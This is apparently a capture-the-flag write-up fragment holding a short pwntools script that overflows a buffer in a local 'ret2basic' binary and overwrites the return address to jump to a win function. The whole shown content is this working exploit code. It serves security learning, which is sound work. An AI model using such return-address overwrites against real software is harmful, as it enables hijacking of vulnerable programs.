Tags: stackoverflow pwn 

Rating:

```
from pwn import *

context(arch='amd64',log_level='debug')

p=process('./ret2basic')
win_addr = 0x0401215
payload = 'A'*0x70 + 'A'*0x08 + p64(win_addr)
p.sendlineafter('this?: ',payload)
p.interactive()
```